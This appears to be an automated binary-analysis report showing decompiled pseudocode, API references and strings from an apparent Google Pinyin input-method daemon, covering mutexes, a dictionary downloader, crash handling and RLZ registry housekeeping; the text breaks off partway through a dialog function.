                                                                                                                                                                    0x00404a6b
                                                                                                                                                                    0x00404a6e
                                                                                                                                                                    0x00404a70
                                                                                                                                                                    0x00404a88
                                                                                                                                                                    0x00404a88
                                                                                                                                                                    0x00404a72
                                                                                                                                                                    0x00404a72
                                                                                                                                                                    0x00404a76
                                                                                                                                                                    0x00404a7c
                                                                                                                                                                    0x00404a7f
                                                                                                                                                                    0x00404a7f
                                                                                                                                                                    0x00404a96
                                                                                                                                                                    0x00404a9b
                                                                                                                                                                    0x00404aa0
                                                                                                                                                                    0x00404aa2
                                                                                                                                                                    0x00404aa7
                                                                                                                                                                    0x00404aaa
                                                                                                                                                                    0x00404aac
                                                                                                                                                                    0x00404abd
                                                                                                                                                                    0x00404abd
                                                                                                                                                                    0x00404aae
                                                                                                                                                                    0x00404aae
                                                                                                                                                                    0x00404ab4
                                                                                                                                                                    0x00404ab4
                                                                                                                                                                    0x00404ad0
                                                                                                                                                                    0x00404ad9
                                                                                                                                                                    0x00404aeb
                                                                                                                                                                    0x00404af6
                                                                                                                                                                    0x00404afc
                                                                                                                                                                    0x00404b04
                                                                                                                                                                    0x00404b08
                                                                                                                                                                    0x00404b0c
                                                                                                                                                                    0x00404b10
                                                                                                                                                                    0x00404b14
                                                                                                                                                                    0x00404b18
                                                                                                                                                                    0x00404b1c
                                                                                                                                                                    0x00404b2e
                                                                                                                                                                    0x00404b32
                                                                                                                                                                    0x00404b36
                                                                                                                                                                    0x00404b3c
                                                                                                                                                                    0x00404b48
                                                                                                                                                                    0x00404b4c
                                                                                                                                                                    0x00404b56
                                                                                                                                                                    0x00404b5c
                                                                                                                                                                    0x00404b62
                                                                                                                                                                    0x00404b66
                                                                                                                                                                    0x00404b6b
                                                                                                                                                                    0x00404b74
                                                                                                                                                                    0x00404b79
                                                                                                                                                                    0x00404b7d
                                                                                                                                                                    0x00404b7f
                                                                                                                                                                    0x00404b82
                                                                                                                                                                    0x00404b87
                                                                                                                                                                    0x00404b8a
                                                                                                                                                                    0x00404b8a
                                                                                                                                                                    0x00404b8e
                                                                                                                                                                    0x00404b92
                                                                                                                                                                    0x00404b96
                                                                                                                                                                    0x00404b9a
                                                                                                                                                                    0x00404b9c
                                                                                                                                                                    0x00404b9f
                                                                                                                                                                    0x00404ba4
                                                                                                                                                                    0x00404ba7
                                                                                                                                                                    0x00404ba7
                                                                                                                                                                    0x00404bab
                                                                                                                                                                    0x00404bb3
                                                                                                                                                                    0x00404bb7
                                                                                                                                                                    0x00404bbb
                                                                                                                                                                    0x00404bbf
                                                                                                                                                                    0x00404bc7
                                                                                                                                                                    0x00404bc9
                                                                                                                                                                    0x00404bcb
                                                                                                                                                                    0x00404bcc
                                                                                                                                                                    0x00404bd1
                                                                                                                                                                    0x00404bd1
                                                                                                                                                                    0x00404bd4
                                                                                                                                                                    0x00404bdc
                                                                                                                                                                    0x00404be0
                                                                                                                                                                    0x00404be4
                                                                                                                                                                    0x00404be8
                                                                                                                                                                    0x00404bec
                                                                                                                                                                    0x00404bee
                                                                                                                                                                    0x00404bf0
                                                                                                                                                                    0x00404bf6
                                                                                                                                                                    0x00404bf6
                                                                                                                                                                    0x00404bf8
                                                                                                                                                                    0x00404bfc
                                                                                                                                                                    0x00404bfe
                                                                                                                                                                    0x00404c01
                                                                                                                                                                    0x00404c01
                                                                                                                                                                    0x00404c0e
                                                                                                                                                                    0x00404c16
                                                                                                                                                                    0x00404c22
                                                                                                                                                                    0x00404c2a
                                                                                                                                                                    0x00404c36
                                                                                                                                                                    0x0040484d
                                                                                                                                                                    0x0040484d
                                                                                                                                                                    0x00404855
                                                                                                                                                                    0x00404861
                                                                                                                                                                    0x00404869
                                                                                                                                                                    0x0040486e
                                                                                                                                                                    0x00404875
                                                                                                                                                                    0x00404875
                                                                                                                                                                    0x00404c37
                                                                                                                                                                    0x00404c42
                                                                                                                                                                    0x0040468d
                                                                                                                                                                    0x0040468e
                                                                                                                                                                    0x0040468e
                                                                                                                                                                    0x00404c4e
                                                                                                                                                                    0x00404c56
                                                                                                                                                                    0x00404c57
                                                                                                                                                                    0x00404c58
                                                                                                                                                                    0x00404c6d

APIs
• CreateMutexW.KERNEL32(00000000,00000001,GooglePinyinDaemon2Singleton,09D48295,?,00000000), ref: 00404674
• GetLastError.KERNEL32(?,00000000), ref: 00404680
• CloseHandle.KERNEL32(00000000,?,00000000), ref: 0040468E
• _memset.LIBCMT ref: 004046B6
• CreateThread.KERNEL32 ref: 0040488C

Strings
• dict_index.zip, xrefs: 0040470D
• https://clients2.google.com/ime/pinyin/dicts, xrefs: 004046D3
• GooglePinyinDaemon2Singleton, xrefs: 0040466A
• dict_index.pb, xrefs: 00404738
• GooglePinyinItemDownloader, xrefs: 004047DE

Memory Dump Source
• Source File: 00000000.00000002.259489856.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.259327477.0000000000400000.00000002.00020000.sdmp
• Associated: 00000000.00000002.263030676.00000000004F0000.00000040.00020000.sdmp
• Associated: 00000000.00000002.263045725.00000000004F2000.00000080.00020000.sdmp
• Associated: 00000000.00000002.263130751.0000000000521000.00000002.00020000.sdmp
• Associated: 00000000.00000002.263274480.0000000000559000.00000004.00020000.sdmp
• Associated: 00000000.00000002.263305880.000000000055A000.00000008.00020000.sdmp
• Associated: 00000000.00000002.263329525.0000000000562000.00000002.00020000.sdmp

Similarity
• API ID: Create$CloseErrorHandleLastMutexThread_memset
• String ID: GooglePinyinDaemon2Singleton$GooglePinyinItemDownloader$dict_index.pb$dict_index.zip$https://clients2.google.com/ime/pinyin/dicts
• API String ID: 2067017847-2067477945
• Opcode ID: 989a4f79acc1e761c418b38c8bfce9bed01fa0d7554745251b5d09348078f3ee
• Instruction ID: 5a5b24ca35731e1caa48117c7c9ee091826aff0e96ca878040f2ffeb355302aa
• Opcode Fuzzy Hash: 989a4f79acc1e761c418b38c8bfce9bed01fa0d7554745251b5d09348078f3ee
• Instruction Fuzzy Hash: 31F1B6F15083809FD320DF659885B9BBBE8BF95308F404D3EF689A7291D77899048B5B

Uniqueness
Uniqueness Score: -1.00%

                                                                                                                                                                    C-Code - Quality: 46%
                                                                                                                                                                    			E0040D430(void* __ebx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20) {
intOrPtr _v8;
char _v16;
signed int _v24;
char _v748;
intOrPtr _v752;
intOrPtr _v756;
intOrPtr _v760;
char _v1012;
char _v1016;
char _v1268;
char _v1524;
char _v1528;
intOrPtr _v1580;
char* _v1584;
char* _v1588;
intOrPtr _v1592;
char _v1604;
char* _v1608;
char* _v1612;
char _v1616;
intOrPtr _v1620;
intOrPtr _v1624;
char* _v1628;
intOrPtr _v1652;
char _v1660;
intOrPtr _v1664;
signed int _v1668;
signed int _v1672;
char _v2392;
intOrPtr _v2396;
char* _v2404;
char _v2660;
char _v3168;
char _v3172;
char* _v3224;
char* _v3228;
char* _v3232;
intOrPtr _v3236;
char _v3248;
char* _v3252;
char* _v3256;
char _v3260;
void* _v3264;
void* __edi;
void* __esi;
void* __ebp;
signed int _t76;
signed int _t78;
_Unknown_base(*)()* _t93;
void* _t94;
signed int _t97;
signed int _t99;
_Unknown_base(*)()* _t109;
void* _t111;
void* _t113;
intOrPtr _t124;
intOrPtr _t153;
char* _t154;
void* _t155;
intOrPtr* _t158;
char _t160;
void* _t161;
intOrPtr* _t162;
signed int _t165;
signed int _t167;
signed int _t173;
signed int _t175;
signed int _t178;

_push(0xffffffff);
_push(0x50ecbb);
_push( *[fs:0x0]);
_t167 = (_t165 & 0xfffffff8) - 0x648;
_t76 =  *0x5596fc; // 0x9d48295
_v24 = _t76 ^ _t167;
_push(__ebx);
_t78 =  *0x5596fc; // 0x9d48295
_push(_t78 ^ _t167);
 *[fs:0x0] =  &_v16;
_t153 = _a4;
_t124 = _a8;
_v1620 = _a12;
E0040D290(_t153,  &_v1616);
_v8 = 0;
_t158 = _v1616;
L004F3CE0( &_v1524, 0, 0x308);
L004F1E32( &_v1524, 0x80, 0xffffffff, L"%s", _t153);
L004F1E32( &_v1268, 0x80, 0xffffffff, L"%s", _t124);
L004F1E32( &_v1012, 0x80, 0xffffffff, L"%s", _v1620);
_v756 = _a16;
_v752 = 1;
L004F3CE0( &_v1604, 0, 0x50);
L004F3CE0( &_v748, 0, 0x2cc);
_t173 = _t167 + 0x60;
_v1612 =  &_v1604;
_v1608 =  &_v748;
_v1624 = 0;
_t93 = GetProcAddress(GetModuleHandleW(L"kernel32"), "RtlCaptureContext");
if(_t93 != 0) {
	 *_t93( &_v748);
	_v1588 =  &_v1528;
	_v1608 = 0xc0000025;
	_v1592 = 3;
	_v1584 =  &_v1016;
	_v1580 = _v760;
	_v1628 =  &_v1616;
}
if( *((intOrPtr*)(_t158 + 0xc)) == 0) {
	_t94 = E0040D7A0(_t158, _v1624,  &_v1524);
} else {
	_push(GetCurrentThreadId());
	_push(_t158);
	_t94 = E0040D840(_v1624,  &_v1524);
}
if(_t94 == 0) {
	_t158 =  *((intOrPtr*)(_t158 + 0x8c));
	if(_t158 == 0) {
		_t94 = L004EEF89();
	} else {
		_t94 =  *_t158(_t153, _t124, _v1620, _a16, _a20);
		_t173 = _t173 + 0x14;
	}
}
_push(0);
E004F15DB(_t94, _t124);
asm("int3");
asm("int3");
asm("int3");
asm("int3");
asm("int3");
asm("int3");
asm("int3");
asm("int3");
asm("int3");
asm("int3");
asm("int3");
asm("int3");
asm("int3");
_push(0xffffffff);
_push(0x50ec7b);
_push( *[fs:0x0]);
_t175 = (_t173 & 0xfffffff8) - 0x644;
_t97 =  *0x5596fc; // 0x9d48295
_v1668 = _t97 ^ _t175;
_push(_t158);
_push(_t153);
_t99 =  *0x5596fc; // 0x9d48295
_push(_t99 ^ _t175);
 *[fs:0x0] =  &_v1660;
E0040D290(_t153,  &_v3260);
_v1652 = 0;
_t160 = _v3260;
L004F3CE0( &_v3168, 0, 0x308);
_v2396 = 2;
L004F3CE0( &_v3248, 0, 0x50);
_t146 =  &_v2392;
L004F3CE0( &_v2392, 0, 0x2cc);
_t178 = _t175 + 0x24;
_v3256 =  &_v3248;
_v3252 =  &_v2392;
_t154 = 0;
_t109 = GetProcAddress(GetModuleHandleW(L"kernel32"), "RtlCaptureContext");
if(_t109 != 0) {
	 *_t109( &_v2392);
	_t146 = _v2404;
	_v3252 = 0xc0000025;
	_v3236 = 3;
	_v3232 =  &_v3172;
	_v3228 =  &_v2660;
	_v3224 = _v2404;
	_t154 =  &_v3260;
}
if( *((intOrPtr*)(_t160 + 0xc)) == 0) {
	_t111 = E0040D7A0(_t160, _t154,  &_v3168);
} else {
	_push(GetCurrentThreadId());
	_push(_t160);
	_t146 =  &_v3168;
	_t111 = E0040D840(_t154,  &_v3168);
}
if(_t111 != 0) {
	L18:
	_push(0);
	E004F15DB(_t111, _t124);
} else {
	_t162 =  *((intOrPtr*)(_t160 + 0x90));
	if(_t162 != 0) {
		_t111 =  *_t162();
		goto L18;
	}
}
_t113 = E0040D300();
 *[fs:0x0] = _v1664;
                                                                                                                                                                    				_pop(_t155);
                                                                                                                                                                    				_pop(_t161);
                                                                                                                                                                    				return L004EEDC9(_t113, _t124, _v1672 ^ _t178, _t146, _t155, _t161);
                                                                                                                                                                    			}


                                                                                                                                                                    APIs
                                                                                                                                                                      • Part of subcall function 0040D290: EnterCriticalSection.KERNEL32(0055F688,?,0040D374,09D48295), ref: 0040D296
                                                                                                                                                                      • Part of subcall function 0040D290: std::_Xinvalid_argument.LIBCPMT ref: 0040D2C6
                                                                                                                                                                      • Part of subcall function 0040D290: SetUnhandledExceptionFilter.KERNEL32(?,0040D374,09D48295), ref: 0040D2D7
                                                                                                                                                                      • Part of subcall function 0040D290: __set_purecall_handler.LIBCMT ref: 0040D2E6
                                                                                                                                                                      • Part of subcall function 0040D290: __set_purecall_handler.LIBCMT ref: 0040D2F4
                                                                                                                                                                    • _memset.LIBCMT ref: 0040D4A1
                                                                                                                                                                    • __snwprintf_s.LIBCMT ref: 0040D4BE
                                                                                                                                                                    • __snwprintf_s.LIBCMT ref: 0040D4DB
                                                                                                                                                                    • __snwprintf_s.LIBCMT ref: 0040D4FC
                                                                                                                                                                    • _memset.LIBCMT ref: 0040D522
                                                                                                                                                                    • _memset.LIBCMT ref: 0040D539
                                                                                                                                                                    • GetModuleHandleW.KERNEL32 ref: 0040D566
                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000), ref: 0040D56D
                                                                                                                                                                    • GetCurrentThreadId.KERNEL32 ref: 0040D5BD
                                                                                                                                                                    • _memset.LIBCMT ref: 0040D683
                                                                                                                                                                    • _memset.LIBCMT ref: 0040D69F
                                                                                                                                                                    • _memset.LIBCMT ref: 0040D6B6
                                                                                                                                                                    • GetModuleHandleW.KERNEL32(kernel32,RtlCaptureContext,?,?,?,?,00000000,00000050,09D48295,?,?), ref: 0040D6DD
                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000), ref: 0040D6E4
                                                                                                                                                                      • Part of subcall function 0040D7A0: EnterCriticalSection.KERNEL32(?,?,0040D3BF,?,00000000), ref: 0040D7A8
                                                                                                                                                                      • Part of subcall function 0040D7A0: LeaveCriticalSection.KERNEL32(?), ref: 0040D7B8
                                                                                                                                                                    • GetCurrentThreadId.KERNEL32 ref: 0040D730
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000000.00000002.259489856.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                    • Associated: 00000000.00000002.259327477.0000000000400000.00000002.00020000.sdmp
                                                                                                                                                                    • Associated: 00000000.00000002.263030676.00000000004F0000.00000040.00020000.sdmp
                                                                                                                                                                    • Associated: 00000000.00000002.263045725.00000000004F2000.00000080.00020000.sdmp
                                                                                                                                                                    • Associated: 00000000.00000002.263130751.0000000000521000.00000002.00020000.sdmp
                                                                                                                                                                    • Associated: 00000000.00000002.263274480.0000000000559000.00000004.00020000.sdmp
                                                                                                                                                                    • Associated: 00000000.00000002.263305880.000000000055A000.00000008.00020000.sdmp
                                                                                                                                                                    • Associated: 00000000.00000002.263329525.0000000000562000.00000002.00020000.sdmp
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: _memset$CriticalSection__snwprintf_s$AddressCurrentEnterHandleModuleProcThread__set_purecall_handler$ExceptionFilterLeaveUnhandledXinvalid_argumentstd::_
                                                                                                                                                                    • String ID: %$%$RtlCaptureContext$kernel32
                                                                                                                                                                    • API String ID: 2447371126-3470988165
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    C-Code - Quality: 82%
                                                                                                                                                                    			E004C43F0(void* __edx, void* __eflags, intOrPtr _a4) {
                                                                                                                                                                    				char _v0;
                                                                                                                                                                    				char _v4;
                                                                                                                                                                    				char _v8;
                                                                                                                                                                    				char _v12;
                                                                                                                                                                    				struct _SECURITY_ATTRIBUTES* _v16;
                                                                                                                                                                    				struct _SECURITY_ATTRIBUTES* _v20;
                                                                                                                                                                    				char _v24;
                                                                                                                                                                    				void* _v28;
                                                                                                                                                                    				void* _v32;
                                                                                                                                                                    				char _v36;
                                                                                                                                                                    				char _v40;
                                                                                                                                                                    				short* _v44;
                                                                                                                                                                    				void* _v48;
                                                                                                                                                                    				char _v52;
                                                                                                                                                                    				void* __ebx;
                                                                                                                                                                    				void* __edi;
                                                                                                                                                                    				void* __esi;
                                                                                                                                                                    				signed int _t53;
                                                                                                                                                                    				void* _t57;
                                                                                                                                                                    				void* _t61;
                                                                                                                                                                    				intOrPtr _t65;
                                                                                                                                                                    				void* _t72;
                                                                                                                                                                    				void* _t79;
                                                                                                                                                                    				void* _t91;
                                                                                                                                                                    				void* _t101;
                                                                                                                                                                    				void* _t102;
                                                                                                                                                                    				signed int _t111;
                                                                                                                                                                    				void* _t131;
                                                                                                                                                                    				void* _t135;
                                                                                                                                                                    				void* _t137;
                                                                                                                                                                    				void* _t140;
                                                                                                                                                                    				void* _t143;
                                                                                                                                                                    				void* _t157;
                                                                                                                                                                    				void* _t160;
                                                                                                                                                                    				signed int _t161;
                                                                                                                                                                    				void* _t162;
                                                                                                                                                                    				void* _t166;
                                                                                                                                                                    
                                                                                                                                                                    				_t166 = __eflags;
                                                                                                                                                                    				_t131 = __edx;
                                                                                                                                                                    				_push(0xffffffff);
                                                                                                                                                                    				_push(0x511da8);
                                                                                                                                                                    				_push( *[fs:0x0]);
                                                                                                                                                                    				_t161 = _t160 - 0x24;
                                                                                                                                                                    				_push(_t140);
                                                                                                                                                                    				_t53 =  *0x5596fc; // 0x9d48295
                                                                                                                                                                    				_push(_t53 ^ _t161);
                                                                                                                                                                    				 *[fs:0x0] =  &_v12;
                                                                                                                                                                    				_t111 = 0;
                                                                                                                                                                    				_v32 = 0;
                                                                                                                                                                    				_t135 = CreateMutexW(0, 0, L"{A946A6A9-917E-4949-B9BC-6BADA8C7FD63}");
                                                                                                                                                                    				_push(_t135);
                                                                                                                                                                    				_v28 = _t135;
                                                                                                                                                                    				_t57 = L004C5D10(_t131, _t166);
                                                                                                                                                                    				_t162 = _t161 + 4;
                                                                                                                                                                    				if(_t57 != 0) {
                                                                                                                                                                    					_t111 = 0 | WaitForSingleObject(_t135, 0x1388) == 0x00000000;
                                                                                                                                                                    					_v32 = 0;
                                                                                                                                                                    				}
                                                                                                                                                                    				_v4 = 0;
                                                                                                                                                                    				if(_t111 == 0) {
                                                                                                                                                                    					L11:
                                                                                                                                                                    					_push(_t135);
                                                                                                                                                                    					goto L31;
                                                                                                                                                                    				} else {
                                                                                                                                                                    					_v44 = 0x80000001;
                                                                                                                                                                    					_v4 = 1;
                                                                                                                                                                    					if(E004C75E0() != 0) {
                                                                                                                                                                    						L7:
                                                                                                                                                                    						_t61 = _v44;
                                                                                                                                                                    						if(_t61 != 0 && _t61 != 0x80000001) {
                                                                                                                                                                    							RegCloseKey(_t61);
                                                                                                                                                                    						}
                                                                                                                                                                    						ReleaseMutex(_t135);
                                                                                                                                                                    						goto L11;
                                                                                                                                                                    					} else {
                                                                                                                                                                    						if(E004C76D0(1, _t131, _t135, _t140) == 0) {
                                                                                                                                                                    							L12:
                                                                                                                                                                    							_v24 = 0;
                                                                                                                                                                    							_v20 = 0;
                                                                                                                                                                    							_v16 = 0;
                                                                                                                                                                    							_v4 = 2;
                                                                                                                                                                    							_t65 =  *0x559000; // 0x521840
                                                                                                                                                                    							_t18 = _t65 + 0xc; // 0x4edeb4
                                                                                                                                                                    							_v48 =  *((intOrPtr*)( *_t18))() + 0x10;
                                                                                                                                                                    							_push("N");
                                                                                                                                                                    							_push(L"Events");
                                                                                                                                                                    							_v4 = 3;
                                                                                                                                                                    							L004C7EF0( &_v48, L"%s\\%s\\%s", L"Software\\Google\\Common\\Rlz");
                                                                                                                                                                    							_t162 = _t162 + 0x10;
                                                                                                                                                                    							_push( &_v24);
                                                                                                                                                                    							_t133 = 0x2001f;
                                                                                                                                                                    							_t72 = E00401710(_v48, _v44, 0x2001f);
                                                                                                                                                                    							__eflags = _t72;
                                                                                                                                                                    							if(_t72 == 0) {
                                                                                                                                                                    								_t137 = L004C5E10(_v0);
                                                                                                                                                                    								_t157 = E004C61E0(_a4);
                                                                                                                                                                    								__eflags = _t137;
                                                                                                                                                                    								if(_t137 == 0) {
                                                                                                                                                                    									L27:
                                                                                                                                                                    									L004C8A50( &_v52, _t133);
                                                                                                                                                                    									E00401590( &_v28);
                                                                                                                                                                    									_t79 = _v48;
                                                                                                                                                                    									__eflags = _t79;
                                                                                                                                                                    									if(_t79 != 0) {
                                                                                                                                                                    										__eflags = _t79 - 0x80000001;
                                                                                                                                                                    										if(_t79 != 0x80000001) {
                                                                                                                                                                    											RegCloseKey(_t79);
                                                                                                                                                                    										}
                                                                                                                                                                    									}
                                                                                                                                                                    									_t143 = _v32;
                                                                                                                                                                    									ReleaseMutex(_t143);
                                                                                                                                                                    									_push(_t143);
                                                                                                                                                                    									L31:
                                                                                                                                                                    									CloseHandle();
                                                                                                                                                                    									goto L32;
                                                                                                                                                                    								} else {
                                                                                                                                                                    									__eflags = _t157;
                                                                                                                                                                    									if(_t157 == 0) {
                                                                                                                                                                    										goto L27;
                                                                                                                                                                    									} else {
                                                                                                                                                                    										__eflags =  *_t137;
                                                                                                                                                                    										if( *_t137 == 0) {
                                                                                                                                                                    											L25:
                                                                                                                                                                    											L004C8A50( &_v52, _t133);
                                                                                                                                                                    											E00401590( &_v28);
                                                                                                                                                                    											L004C7B10( &_v48);
                                                                                                                                                                    											L004C5DF0( &_v36);
                                                                                                                                                                    											L32:
                                                                                                                                                                    											 *[fs:0x0] = _v12;
                                                                                                                                                                    											return 0;
                                                                                                                                                                    										} else {
                                                                                                                                                                    											__eflags = _v0;
                                                                                                                                                                    											if(_v0 == 0) {
                                                                                                                                                                    												goto L25;
                                                                                                                                                                    											} else {
                                                                                                                                                                    												L0040CC20( &_v44);
                                                                                                                                                                    												_push(_t157);
                                                                                                                                                                    												_v8 = 4;
                                                                                                                                                                    												L004C7EF0( &_v44, L"%s%s", _t137);
                                                                                                                                                                    												_t162 = _t162 + 0xc;
                                                                                                                                                                    												RegDeleteValueW(_v28, _v44);
                                                                                                                                                                    												_t133 =  &_v28;
                                                                                                                                                                    												_t91 = E00401780( &_v28, _v44);
                                                                                                                                                                    												__eflags = _t91;
                                                                                                                                                                    												if(_t91 != 0) {
                                                                                                                                                                    													L004C8A50( &_v52,  &_v28);
                                                                                                                                                                    													L004C8A50( &_v52,  &_v28);
                                                                                                                                                                    													E00401590( &_v28);
                                                                                                                                                                    													L004C7B10( &_v48);
                                                                                                                                                                    													L004C5DF0( &_v36);
                                                                                                                                                                    													 *[fs:0x0] = _v16;
                                                                                                                                                                    													return 1;
                                                                                                                                                                    												} else {
                                                                                                                                                                    													L004C8A50( &_v52,  &_v28);
                                                                                                                                                                    													goto L25;
                                                                                                                                                                    												}
                                                                                                                                                                    											}
                                                                                                                                                                    										}
                                                                                                                                                                    									}
                                                                                                                                                                    								}
                                                                                                                                                                    							} else {
                                                                                                                                                                    								L004C8A50( &_v52, 0x2001f);
                                                                                                                                                                    								_t101 = _v28;
                                                                                                                                                                    								__eflags = _t101;
                                                                                                                                                                    								if(_t101 != 0) {
                                                                                                                                                                    									RegCloseKey(_t101);
                                                                                                                                                                    								}
                                                                                                                                                                    								_t102 = _v48;
                                                                                                                                                                    								__eflags = _t102;
                                                                                                                                                                    								if(_t102 != 0) {
                                                                                                                                                                    									__eflags = _t102 - 0x80000001;
                                                                                                                                                                    									if(_t102 != 0x80000001) {
                                                                                                                                                                    										RegCloseKey(_t102);
                                                                                                                                                                    									}
                                                                                                                                                                    								}
                                                                                                                                                                    								ReleaseMutex(_t135);
                                                                                                                                                                    								CloseHandle(_t135);
                                                                                                                                                                    								 *[fs:0x0] = _v16;
                                                                                                                                                                    								return 1;
                                                                                                                                                                    							}
                                                                                                                                                                    						} else {
                                                                                                                                                                    							_v40 = 0;
                                                                                                                                                                    							if(E004C7590(1, _t135,  &_v40) < 0 || _v40 <= 1) {
                                                                                                                                                                    								goto L7;
                                                                                                                                                                    							} else {
                                                                                                                                                                    								goto L12;
                                                                                                                                                                    							}
                                                                                                                                                                    						}
                                                                                                                                                                    					}
                                                                                                                                                                    				}
                                                                                                                                                                    			}









































                                                                                                                                                                    APIs
                                                                                                                                                                    • CreateMutexW.KERNEL32(00000000,00000000,{A946A6A9-917E-4949-B9BC-6BADA8C7FD63},09D48295,00000000,?,?,?,?,?,?,00000000,00511DA8,000000FF,004C5986), ref: 004C4426
                                                                                                                                                                    • WaitForSingleObject.KERNEL32(00000000,00001388,?,?,?,?,00000000,00511DA8,000000FF,004C5986,?,?), ref: 004C4445
                                                                                                                                                                      • Part of subcall function 00401710: RegCloseKey.ADVAPI32(?,?,?,004018A8,?), ref: 00401753
                                                                                                                                                                    • RegCloseKey.ADVAPI32(80000001), ref: 004C44A6
                                                                                                                                                                    • ReleaseMutex.KERNEL32(00000000), ref: 004C44AD
                                                                                                                                                                    • RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,?,00000000,00511DA8,000000FF,004C5986,?,?), ref: 004C4538
                                                                                                                                                                      • Part of subcall function 00401590: RegCloseKey.ADVAPI32(00000000,00403512,?,?,?,?,?,?,?,?,?,?,?,00510206,000000FF), ref: 00401597
                                                                                                                                                                      • Part of subcall function 004C7B10: RegCloseKey.ADVAPI32(?,004C4AED,00000000,00512DA0,000000FF,004C280F,?,?,?,00000008,?,?,00000005,?,?,?), ref: 004C7B1E
                                                                                                                                                                      • Part of subcall function 004C5DF0: ReleaseMutex.KERNEL32(?,004C4D22,?,00000008,?,?), ref: 004C5DF9
                                                                                                                                                                      • Part of subcall function 004C5DF0: CloseHandle.KERNEL32(?,004C4D22,?,00000008,?,?), ref: 004C5E03
                                                                                                                                                                    • RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,?,00000000,00511DA8,000000FF,004C5986,?,?), ref: 004C454A
                                                                                                                                                                    • ReleaseMutex.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,00000000,00511DA8,000000FF,004C5986,?,?), ref: 004C454D
                                                                                                                                                                    • CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,?,?,00000000,00511DA8,000000FF,004C5986,?,?), ref: 004C4554
                                                                                                                                                                    • RegDeleteValueW.ADVAPI32(?,?,00000000,00000000,?,?,?,?,?,?,?,?,?,00000000,00511DA8,000000FF), ref: 004C45CC
                                                                                                                                                                    • CloseHandle.KERNEL32(00000000,?,?,?,?,00000000,00511DA8,000000FF,004C5986,?,?), ref: 004C4687
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000000.00000002.259489856.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                    • Associated: 00000000.00000002.259327477.0000000000400000.00000002.00020000.sdmp
                                                                                                                                                                    • Associated: 00000000.00000002.263030676.00000000004F0000.00000040.00020000.sdmp
                                                                                                                                                                    • Associated: 00000000.00000002.263045725.00000000004F2000.00000080.00020000.sdmp
                                                                                                                                                                    • Associated: 00000000.00000002.263130751.0000000000521000.00000002.00020000.sdmp
                                                                                                                                                                    • Associated: 00000000.00000002.263274480.0000000000559000.00000004.00020000.sdmp
                                                                                                                                                                    • Associated: 00000000.00000002.263305880.000000000055A000.00000008.00020000.sdmp
                                                                                                                                                                    • Associated: 00000000.00000002.263329525.0000000000562000.00000002.00020000.sdmp
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: Close$Mutex$HandleRelease$CreateDeleteObjectSingleValueWait
                                                                                                                                                                    • String ID: %s%s$%s\%s\%s$Events$Software\Google\Common\Rlz${A946A6A9-917E-4949-B9BC-6BADA8C7FD63}
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    C-Code - Quality: 77%
                                                                                                                                                                    			E004475C0(struct HWND__* __edx, intOrPtr _a4) {
                                                                                                                                                                    				int _v8;
                                                                                                                                                                    				char _v16;
                                                                                                                                                                    				WCHAR* _v24;
                                                                                                                                                                    				WCHAR* _v28;
                                                                                                                                                                    				void* __ebx;
                                                                                                                                                                    				void* __esi;
                                                                                                                                                                    				signed int _t37;
                                                                                                                                                                    				int _t44;
                                                                                                                                                                    				void* _t53;
                                                                                                                                                                    				intOrPtr _t56;
                                                                                                                                                                    				void* _t58;
                                                                                                                                                                    				void* _t60;
                                                                                                                                                                    				intOrPtr* _t67;
                                                                                                                                                                    				int _t79;
                                                                                                                                                                    				intOrPtr _t117;
                                                                                                                                                                    				struct HWND__* _t119;
                                                                                                                                                                    				void* _t125;
                                                                                                                                                                    				int _t126;
                                                                                                                                                                    				int _t127;
                                                                                                                                                                    				int _t128;
                                                                                                                                                                    				struct HWND__** _t129;
                                                                                                                                                                    				int _t132;
                                                                                                                                                                    				void* _t133;
                                                                                                                                                                    				intOrPtr _t135;
                                                                                                                                                                    				WCHAR* _t140;
                                                                                                                                                                    				signed int _t142;
                                                                                                                                                                    
                                                                                                                                                                    				_t115 = __edx;
                                                                                                                                                                    				_push(0xffffffff);
                                                                                                                                                                    				_push(0x514c78);
                                                                                                                                                                    				_push( *[fs:0x0]);
                                                                                                                                                                    				_t37 =  *0x5596fc; // 0x9d48295
                                                                                                                                                                    				_push(_t37 ^ (_t142 & 0xfffffff8) - 0x00000008);
                                                                                                                                                                    				 *[fs:0x0] =  &_v16;
                                                                                                                                                                    				_t135 = _a4;
                                                                                                                                                                    				_t125 = _t135 + 0x20;
                                                                                                                                                                    				if(_t125 == 0) {
                                                                                                                                                                    					_t126 = 0;
                                                                                                                                                                    					__eflags = 0;
                                                                                                                                                                    				} else {
                                                                                                                                                                    					_t126 = _t125 + 0xffffffe0;
                                                                                                                                                                    				}
                                                                                                                                                                    				if(SetDlgItemTextW( *(_t126 + 4), 0x452,  *(_t135 + 0x24)) != 0) {
                                                                                                                                                                    					_t127 = _t135 + 0x20;
                                                                                                                                                                    					__eflags = _t127;
                                                                                                                                                                    					if(_t127 == 0) {
                                                                                                                                                                    						_t128 = 0;
                                                                                                                                                                    						__eflags = 0;
                                                                                                                                                                    					} else {
                                                                                                                                                                    						_t128 = _t127 + 0xffffffe0;
                                                                                                                                                                    					}
                                                                                                                                                                    					_t115 =  *(_t128 + 4);
                                                                                                                                                                    					_t44 = SetDlgItemTextW( *(_t128 + 4), 0x453,  *(_t135 + 0x28));
                                                                                                                                                                    					__eflags = _t44;
                                                                                                                                                                    					if(_t44 != 0) {
                                                                                                                                                                    						goto L16;
                                                                                                                                                                    					} else {
